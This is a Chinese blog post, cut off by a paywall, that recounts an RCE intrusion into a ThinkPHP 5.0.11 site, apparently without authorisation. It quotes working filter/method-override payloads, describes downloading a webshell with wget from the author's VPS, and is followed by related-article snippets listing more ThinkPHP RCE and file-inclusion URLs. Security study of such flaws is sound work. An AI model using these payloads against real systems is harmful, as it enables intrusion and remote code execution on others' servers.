记一次tp5.0.11rce

最新推荐文章于 2022-11-09 11:12:00 发布
最新推荐文章于 2022-11-09 11:12:00 发布
阅读量552 收藏
点赞数 1
分类专栏: 渗透 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43570648/article/details/108171307
版权
本文详细记录了一次针对TP5.0.11的远程代码执行(RCE)渗透测试过程。作者首先描述了如何通过错误提示找到漏洞,然后尝试使用不同exp进行攻击,遇到的阻碍如函数限制、WAF过滤等,并逐步解决,最终成功获取shell。过程中还涉及到文件下载、数据库连接限制的绕过方法,以及利用php7日志实现shell的方法。
摘要由CSDN通过智能技术生成

今天很有感触,我决定从今天开始记录我在ax的点点滴滴,自己的学长都是一步一个脚印走出来,加油,阿鑫。

首先进入网站,xxxx/ 随便输入xxx/admin 然后报错
在这里插入图片描述
然后去网上搜索tp5.0.11的exp打,然后找了一个exp,这tm不直接渗透结束?
在这里插入图片描述
然后看了一下函数,禁止了system,assert函数
在这里插入图片描述
这里再附上几个exp,如果没有禁,可以直接打,

_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
然后我就用了宁外一个exp
wget自己的vps下马,
http://5.com/index.php?s=portal/\think\app/invokefunction&function=call_user_

最低0.47元/天 解锁文章
rangechecks 检测代码检测到超出范围的数组访问。_Thinkphp 5.0远程代码执行漏洞
weixin_39956350的博客
12-16 765
0x01 简叙本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。这部分是官网的漏洞通告,官方最开始的补丁是在library/think/route/dispatch/Module.php中添加。但是随机在第二天的5.1.31版本中将这部分的控制移动到...
回调函数 ⭐⭐⭐
博客
10-15 258
函数的参数可以 是任意的数据类型 参数传递对象 function fn(a){ //var a = {uname:"tom"}; console.log(a.uname);//把参数以对象的方式使用 } fn({uname:"tom"}); 参数传递一个数组 function fn(a){ console.log(a[0]); } fn([4,3,5])
thinkphp 一个文件怎么调用另一个文件中的define()_Thinkphp 反序列化利用链深入分析...
weixin_39605521的博客
12-10 162
作者:Ethan@知道创宇404实验室时间:2019年9月21日原文链接:https://paper.seebug.org/1040/前言今年7月份,ThinkPHP 5.1.x爆出来了一个反序列化漏洞。之前没有分析过关于ThinkPHP的反序列化漏洞。今天就探讨一下ThinkPHP的反序列化问题!环境搭建Thinkphp 5.1.35php 7.0.12漏洞挖掘思路在刚接触反序列化漏洞的时候,更...
thinkphp漏洞_ThinkPHP5.0 远程代码执行漏洞
weixin_39634579的博客
11-25 242
漏洞介绍ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用影响版本5.0全版本复现环境Vulhub漏洞靶场vulhub-master/thinkphp...
学习笔-ThinkPHP5任意方法调用RCE
人饭子的博客
11-09 795
参考链接:Mochazz/ThinkPHP-Vuln/ 影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18 5.1.x : ?s=index/\think\Request/input&filter[]=system&data...
tp-blog:tp5.0.11实战博客原始码
03-23
本篇将深入探讨使用ThinkPHP5.0.11版本构建的博客系统,即“tp-blog”,并解析其源码,帮助读者更好地理解和应用这一系统。 1. ThinkPHP5.0.11基础介绍 ThinkPHP5是基于PHP面向对象的轻量级框架,其核心理念是快速...
thinkphp v5.0.11漏洞_ThinkPHP 5.0命令执行漏洞分析及复现
weixin_39609953的博客
12-21 466
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文作者:小纨绔,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。ThinkPHP 5.0 版本是一个颠覆和重构版本,也是ThinkPHP 十周年献礼版本,基于 PHP5.4 设计(完美支持 PHP7 ),采用全新的架构思想,引入了很多的 PHP 新特性,优化了核心,减少了...
ThinkPHP v5.0.11 核心版
11-28
版本v5.0.11更是该框架的一次重要迭代,进一步提升了开发效率和应用性能。本文将深入探讨ThinkPHP v5.0.11的核心特性,帮助开发者更好地理解和运用这一强大的工具。 首先,ThinkPHP v5.0.11遵循Apache2开源协议,这...
scomm5.0.11
最新发布
05-22
首先,scomm是一款功能强大的通信软件,版本号5.0.11表明它已经经过了多次迭代和优化,具备了更加稳定和高效的服务能力。其核心功能包括串口通信、网络通信、数据传输以及文件管理等,能够满足不同用户在多种场景下...
ThinkPHP5代码审计【RCE
D.MIND 的博客
05-14 1269
composer create-project --prefer-dist topthink/think=5.0.23 thinkphp_5.0.23
ThinkPHP v5.0.11 完整版
12-17
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7343
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2308
录自己的所学以及理解。
thinkphp5 RCE漏洞复现
feng的博客
03-03 3537
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
Thinkphp5未开启强制路由导致的RCE 漏洞复现与分析
xiaolong22333的博客
09-28 1011
影响版本 小于5.0.23 小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/invokefunction&
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
热门推荐
weixin_43263451的博客
03-30 1万+
大概思路就是我们可以修改requests类的filter属性、method属性以及get属性的值,从而在调用param方法时,call_user_func_array的值我们就可以控制,造成了远程代码执行漏洞。 0. 大致流程 经过入口文件进入run函数 首先在116行根据url获取调度信息时,触发变量覆盖漏洞从而修改requests对象的属性值,然后获取?s=captcha的调度信息并返回给$dispatch 再到139行进入exec函数并将$dispatch作为参数带入 跟进后根据$dispatch
定义一个名为Circle的类,其中含有double型的成员变量centerX 和centerY表示圆心坐标,radius表示圆的半径。
寒凡
12-04 1万+
定义一个名为Circle的类,其中含有double型的成员变量centerX 和centerY表示圆心坐标,radius表示圆的半径。 定义求圆的面积方法getArea()方法和求圆周长的方法getPerimeter()。为半径radius定义方法和修改方法。定义一个带参数的构造方法,通过给出圆的半径创建对象。定义默认构造方法,在该方法中调用有参数构造方法,将圆的半径设置为1.0.编写程序测试这个圆类的所有方法。 public class Circle { double centerX ;//表示圆
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1283
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
Windows平台下scomm5.0.11版本发布
但从标题、标签和文件名称可以推断出“scomm5.0.11”是一款为Windows平台设计的软件,具有一个名为“scomm.exe”的可执行程序文件,而且这个软件有一个明确的版本号标,表明它可能经历了多次更新和迭代。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值